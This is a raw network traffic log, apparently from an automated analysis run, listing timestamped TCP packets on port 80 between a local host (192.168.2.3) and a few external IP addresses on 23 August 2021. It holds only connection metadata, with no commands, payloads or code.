Aug 23, 2021 02:08:59.546166897 CEST	80	49766	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.546179056 CEST	80	49766	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.546189070 CEST	80	49766	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.546200037 CEST	80	49766	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.546206951 CEST	80	49766	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.546215057 CEST	80	49766	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.546221972 CEST	80	49766	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.546272993 CEST	80	49766	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.546286106 CEST	80	49766	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.567768097 CEST	80	49766	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.567789078 CEST	80	49766	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.569210052 CEST	80	49766	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.569241047 CEST	80	49766	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.569356918 CEST	49766	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.569637060 CEST	49766	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.569665909 CEST	49766	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.572354078 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.573802948 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.601906061 CEST	49765	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.627223969 CEST	80	49765	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.628827095 CEST	80	49754	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.629009962 CEST	49765	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.629061937 CEST	49754	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.631648064 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.632232904 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.633763075 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.633888006 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.634109974 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.634203911 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.636465073 CEST	49768	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.661667109 CEST	80	49768	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.663927078 CEST	49768	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.664453030 CEST	49768	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.689655066 CEST	80	49768	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.690046072 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.690342903 CEST	80	49768	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.690371990 CEST	80	49768	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.690398932 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.690639973 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.690711021 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.690716982 CEST	49768	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.690826893 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.690892935 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.690947056 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.691176891 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.691324949 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.691387892 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.691498995 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.691773891 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.691891909 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.692034006 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.692147970 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.692568064 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.692603111 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.692682981 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.692873955 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.693209887 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.746776104 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.746948957 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.747167110 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.747212887 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.747308969 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.747328043 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.747339010 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.747354031 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.747740030 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.747925043 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.748071909 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.748298883 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.748380899 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.748766899 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.748847961 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.749314070 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.749386072 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.802970886 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.803006887 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.803181887 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.803277016 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.803396940 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.803508043 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.803693056 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.803749084 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.803900957 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.804030895 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.804249048 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.804362059 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.804486036 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.804852009 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.804915905 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.805253029 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.805320978 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.805406094 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.811126947 CEST	49768	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.812503099 CEST	49769	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.836513042 CEST	80	49768	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.836646080 CEST	49768	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.837809086 CEST	80	49769	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.841655970 CEST	49769	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.841677904 CEST	49769	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.859177113 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.859347105 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.859366894 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.867857933 CEST	80	49769	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.868702888 CEST	80	49769	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.868736982 CEST	80	49769	185.206.180.136	192.168.2.3
Aug 23, 2021 02:08:59.868835926 CEST	49769	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.868896961 CEST	49769	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.906142950 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:08:59.906361103 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:08:59.982239962 CEST	49769	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:08:59.984122038 CEST	49770	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.007863045 CEST	80	49769	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.008033037 CEST	49769	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.009454012 CEST	80	49770	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.009624004 CEST	49770	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.011514902 CEST	49770	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.036767006 CEST	80	49770	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.037549019 CEST	80	49770	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.037579060 CEST	80	49770	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.037674904 CEST	49770	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.186523914 CEST	49770	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.187824011 CEST	49771	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.189331055 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.211868048 CEST	80	49770	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.213115931 CEST	49770	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.213131905 CEST	80	49771	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.214556932 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.214679003 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.214685917 CEST	49771	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.215430021 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.215434074 CEST	49771	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.215673923 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.215706110 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.216156006 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.240629911 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.240662098 CEST	80	49771	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.240708113 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.240848064 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.240871906 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.240897894 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.240978003 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.241000891 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.241034985 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.241076946 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.241086006 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.241122007 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.241132021 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.241341114 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.241398096 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.241421938 CEST	80	49771	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.241446972 CEST	80	49771	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.241529942 CEST	49771	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.241544962 CEST	49771	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.241561890 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.266474009 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.266527891 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.266557932 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.266582966 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.266608953 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.266635895 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.266697884 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.266731024 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.266783953 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.266788960 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.266798019 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.266824007 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.266891956 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.266917944 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.267015934 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.267093897 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.267139912 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.267193079 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.267266989 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.267389059 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.269120932 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.292256117 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.292304039 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.292331934 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.292357922 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.292416096 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.292459965 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.292481899 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.292649031 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.292727947 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.292915106 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.292947054 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.292973042 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.292999029 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.293086052 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.293351889 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.293391943 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.293416977 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.293453932 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.293498993 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.294426918 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.294459105 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.294472933 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.294481039 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.294492006 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.294527054 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.317873001 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.317912102 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.317938089 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.317964077 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.318854094 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.318881989 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.319768906 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.320105076 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.320130110 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.321805954 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.339395046 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.346012115 CEST	80	49772	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.346426010 CEST	49772	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.351835012 CEST	49771	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.353579044 CEST	49774	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.377938032 CEST	80	49771	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.377980947 CEST	80	49767	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.378060102 CEST	49771	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.378123999 CEST	49767	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.378890991 CEST	80	49774	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.379479885 CEST	49774	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.379502058 CEST	49774	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.392416000 CEST	80	49761	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:00.392452002 CEST	80	49761	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:00.392663002 CEST	49761	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:00.392731905 CEST	49761	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:00.400176048 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.400739908 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.404711008 CEST	80	49774	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.405405998 CEST	80	49774	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.405424118 CEST	80	49774	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.405942917 CEST	49774	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.419953108 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.420262098 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.420304060 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.421109915 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.440849066 CEST	49775	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:00.480348110 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.480521917 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.480736017 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.481143951 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.481296062 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.481424093 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.481440067 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.481487036 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.481544971 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.481558084 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.481583118 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.481806040 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.481880903 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.482009888 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.482060909 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.482103109 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.482187033 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.482203960 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.482372999 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.524300098 CEST	49774	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.528079033 CEST	49776	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.541562080 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.541806936 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.541841030 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.541867971 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.541914940 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.542284966 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.542530060 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.542560101 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.542603016 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.542654037 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.549657106 CEST	80	49774	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.550286055 CEST	49774	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.555337906 CEST	80	49776	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.556236982 CEST	49776	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.557205915 CEST	49776	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.582468987 CEST	80	49776	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.583091974 CEST	80	49776	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.583159924 CEST	80	49776	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.583229065 CEST	49776	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.583271027 CEST	49776	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.585562944 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.589106083 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.602123976 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.602282047 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.602950096 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.602977037 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.603189945 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.662559032 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.663585901 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.663631916 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.663701057 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.663719893 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.663777113 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.663788080 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.663995981 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.664000034 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.664012909 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.664099932 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.664165974 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.664187908 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.685149908 CEST	80	49761	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:00.704598904 CEST	80	49775	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:00.704788923 CEST	49775	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:00.706228971 CEST	49775	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:00.706336975 CEST	49775	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:00.707981110 CEST	49776	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.709314108 CEST	49777	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.724204063 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.724318027 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.724349976 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.724422932 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.724637985 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.724667072 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.724710941 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.724752903 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.724808931 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.725137949 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.733539104 CEST	80	49776	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.734944105 CEST	80	49777	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.735125065 CEST	49776	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.735152006 CEST	49777	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.736862898 CEST	49777	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.762948036 CEST	80	49777	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.763499022 CEST	80	49777	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.763535976 CEST	80	49777	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:00.763617039 CEST	49777	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.763657093 CEST	49777	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:00.784912109 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.785166979 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.785281897 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.785435915 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.785464048 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.785527945 CEST	49773	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:00.785689116 CEST	80	49773	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:00.785787106 CEST	80	49773	185.215.113.206	192.168.2.3
